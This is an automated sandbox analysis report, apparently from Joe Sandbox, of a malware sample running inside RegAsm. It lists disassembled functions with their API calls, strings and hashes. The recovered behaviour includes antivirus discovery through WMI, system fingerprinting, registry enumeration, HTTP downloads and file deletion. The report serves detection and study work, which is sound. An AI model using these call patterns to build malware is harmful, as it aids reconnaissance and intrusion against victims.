                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406AE6
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00406AED
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00406C0B
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BEC), ref: 00406C19
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00406C2B
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BF0), ref: 00406C39
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00406D80
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00406D8E
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • memset.MSVCRT ref: 00406DE6
                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00406E0B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4187064601-0
                                                                                                                                                                                                • Opcode ID: 4d6e2d4a90ca7b1422deb661cb4dcf1ab7c7ff220bc24bca7bcae24a37c0bf1d
                                                                                                                                                                                                • Instruction ID: f974eaa0e883c742969b18ff7bec121f05571edb8c267939f240b2802200c6b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d6e2d4a90ca7b1422deb661cb4dcf1ab7c7ff220bc24bca7bcae24a37c0bf1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16226A71800158EADF05EBE6DD46EEEBB75AF25308F10447EF402721E2DB791A18DB26
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F7AB Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 146memorycomtimeCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2555 40f7ab-40f80e _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 2557 40f814-40f846 CoSetProxyBlanket 2555->2557 2558 40f917 2555->2558 2563 40f910-40f915 2557->2563 2564 40f84c-40f857 2557->2564 2559 40f91c-40f91f call 40e912 2558->2559 2562 40f924 2559->2562 2565 40f927-40f933 2562->2565 2563->2559 2564->2565 2566 40f85d-40f872 2564->2566 2566->2565 2568 40f878-40f8a3 VariantInit call 40f711 2566->2568 2571 40f8a8-40f90e FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA call 40e912 VariantClear 2568->2571 2571->2562
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F7B0
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F7C0
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042555C), ref: 0040F7D1
                                                                                                                                                                                                • CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000), ref: 0040F7EB
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042555C,00000000), ref: 0040F821
                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0040F87C
                                                                                                                                                                                                  • Part of subcall function 0040F711: CoCreateInstance.OLE32(00426FE8,00000000,00000001,004253C8,00000000,?), ref: 0040F731
                                                                                                                                                                                                  • Part of subcall function 0040F711: SysAllocString.OLEAUT32(00000000), ref: 0040F73F
                                                                                                                                                                                                  • Part of subcall function 0040F711: _wtoi64.MSVCRT ref: 0040F781
                                                                                                                                                                                                  • Part of subcall function 0040F711: SysFreeString.OLEAUT32(?), ref: 0040F796
                                                                                                                                                                                                  • Part of subcall function 0040F711: SysFreeString.OLEAUT32(00000000), ref: 0040F799
                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F8B3
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F8BF
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040F8C6
                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040F908
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F8F2
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                • API String ID: 3912155974-2016369993
                                                                                                                                                                                                • Opcode ID: cde1aef8a58ec05b87e7774027964f1092df5234e1350f734217cdeff580d1fb
                                                                                                                                                                                                • Instruction ID: 2dc42058d09157e3f2c07f1d508e01a304f20e6d96b8e9efb5375e9e764dae09
                                                                                                                                                                                                • Opcode Fuzzy Hash: cde1aef8a58ec05b87e7774027964f1092df5234e1350f734217cdeff580d1fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 02413971A01229BBCB20DB91DC49EEF7B7CEF49B50F504126F501B6190D7789A42CBA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00404F61 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2574 404f61-404fe5 _EH_prolog call 40e949 call 403a76 call 40e912 call 40eb3c InternetOpenA StrCmpCA 2583 404fe7 2574->2583 2584 404fe8-404feb 2574->2584 2583->2584 2585 404ff1-40500b InternetConnectA 2584->2585 2586 40512c-405133 call 40e949 2584->2586 2588 405011-405040 HttpOpenRequestA 2585->2588 2589 405123-405126 InternetCloseHandle 2585->2589 2590 405138-405173 call 40e97d * 3 2586->2590 2591 405046-405048 2588->2591 2592 40511a-40511d InternetCloseHandle 2588->2592 2589->2586 2594 405060-40508b HttpSendRequestA HttpQueryInfoA 2591->2594 2595 40504a-40505a InternetSetOptionA 2591->2595 2592->2589 2596 40508d-40509a call 40e912 2594->2596 2597 40509f-4050b1 call 40fa62 2594->2597 2595->2594 2596->2590 2605 405174-405181 call 40e912 2597->2605 2606 4050b7-4050b9 2597->2606 2605->2590 2608 405113-405114 InternetCloseHandle 2606->2608 2609 4050bb-4050c0 2606->2609 2608->2592 2612 4050fc-405111 InternetReadFile 2609->2612 2612->2608 2614 4050c2-4050c7 2612->2614 2614->2608 2615 4050c9-4050f7 call 40ea8b call 40e9d0 call 40e97d 2614->2615 2615->2612
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00404F66
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FC9
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404FDD
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405000
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405036
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040505A
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405065
                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405083
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405109
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00405114
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040511D
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00405126
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                • API String ID: 2435781452-2509457195
                                                                                                                                                                                                • Opcode ID: 93153125e7438d58ff9cba7b8ea35b634658ba2396de2236ddff63bd3fa17882
                                                                                                                                                                                                • Instruction ID: fd6fd6e4b06f01989823007b73563df8b6f364aab287b4db5e16c2b1118ff10a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 93153125e7438d58ff9cba7b8ea35b634658ba2396de2236ddff63bd3fa17882
                                                                                                                                                                                                • Instruction Fuzzy Hash: DB518EB2900119AFEB10EBA1DC85FEFBBB9EB05344F10447AF601B6291D7785E44CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F934 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 116comCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2658 40f934-40f997 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 2660 40fa3c 2658->2660 2661 40f99d-40f9c9 CoSetProxyBlanket 2658->2661 2662 40fa41-40fa44 call 40e912 2660->2662 2663 40f9cd-40f9cf 2661->2663 2665 40fa49 2662->2665 2666 40f9d1-40f9dc 2663->2666 2667 40fa35-40fa3a 2663->2667 2668 40fa4c-40fa58 2665->2668 2666->2668 2669 40f9de-40f9f3 2666->2669 2667->2662 2669->2668 2671 40f9f5-40fa33 VariantInit call 40fc78 call 40e912 VariantClear 2669->2671 2671->2665
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F939
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F949
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040F95A
                                                                                                                                                                                                • CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F974
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F9AA
                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0040F9F9
                                                                                                                                                                                                  • Part of subcall function 0040FC78: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0040FA1F,?,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040FC80
                                                                                                                                                                                                  • Part of subcall function 0040FC78: CharToOemW.USER32(?,00000000), ref: 0040FC8C
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040FA2D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                • API String ID: 3694693100-2776955613
                                                                                                                                                                                                • Opcode ID: ed4488ffa682ee0fa871c8f16d3772de84693f4a5857c4c2691c105834dc0452
                                                                                                                                                                                                • Instruction ID: 1e5a7d26c84cebbf14b8aab6c76a6b278336e03c3012eea7505825033b406ba3
                                                                                                                                                                                                • Opcode Fuzzy Hash: ed4488ffa682ee0fa871c8f16d3772de84693f4a5857c4c2691c105834dc0452
                                                                                                                                                                                                • Instruction Fuzzy Hash: 22313D71A01229BBCB20DB91DC49EEF7F78FF49760F50452AF505B6290C7B85642CBA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F0BE Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F0C3
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042520F,00000000,00000000), ref: 0040F10B
                                                                                                                                                                                                • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040F155
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F17F
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040F19C
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040F1C6
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040F1DB
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00425240), ref: 0040F25B
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                                                                                                                                • String ID: - $%s\%s$?
                                                                                                                                                                                                • API String ID: 404191982-3278919252
                                                                                                                                                                                                • Opcode ID: c06cfcfae5a37de0842664defd792e232726c9a30beafe6f8d78b12eb778a3f4
                                                                                                                                                                                                • Instruction ID: bc6ea1ab7ec491c9c8a763c8a3cf3f918ce4c176d8494a98fb0cea41cd146feb
                                                                                                                                                                                                • Opcode Fuzzy Hash: c06cfcfae5a37de0842664defd792e232726c9a30beafe6f8d78b12eb778a3f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 567104B580022DEEDF11DBA1CD84EEEBBBDBF18304F10457AE505B2191DB395A08CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F52A Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040F52F
                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F552
                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F584
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F5C7
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F5CE
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040F5FA
                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,004251E8), ref: 0040F609
                                                                                                                                                                                                  • Part of subcall function 0040F4EF: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F500
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040F628
                                                                                                                                                                                                  • Part of subcall function 0041013F: malloc.MSVCRT ref: 0041014D
                                                                                                                                                                                                  • Part of subcall function 0041013F: strncpy.MSVCRT ref: 0041015D
                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040F655
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                • String ID: :\$C
                                                                                                                                                                                                • API String ID: 688099012-3309953409
                                                                                                                                                                                                • Opcode ID: 0f2ae8ea9575aef42821af1430ad55aa2078cc07246cf39224e5c4fd927df027
                                                                                                                                                                                                • Instruction ID: 9dfbfffdbf2ddaf657f2e54b89b70d54b85bf8aac276decc1d14e9baaa7bd669
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f2ae8ea9575aef42821af1430ad55aa2078cc07246cf39224e5c4fd927df027
                                                                                                                                                                                                • Instruction Fuzzy Hash: F0416A71C01118AACB11EBE6DD89DEFBBB9EF59704F10047EF901B3142DA384A09CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00412046 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041204B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00404F61: _EH_prolog.MSVCRT ref: 00404F66
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FC9
                                                                                                                                                                                                  • Part of subcall function 00404F61: StrCmpCA.SHLWAPI(?), ref: 00404FDD
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405000
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405036
                                                                                                                                                                                                  • Part of subcall function 00404F61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040505A
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405065
                                                                                                                                                                                                  • Part of subcall function 00404F61: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405083
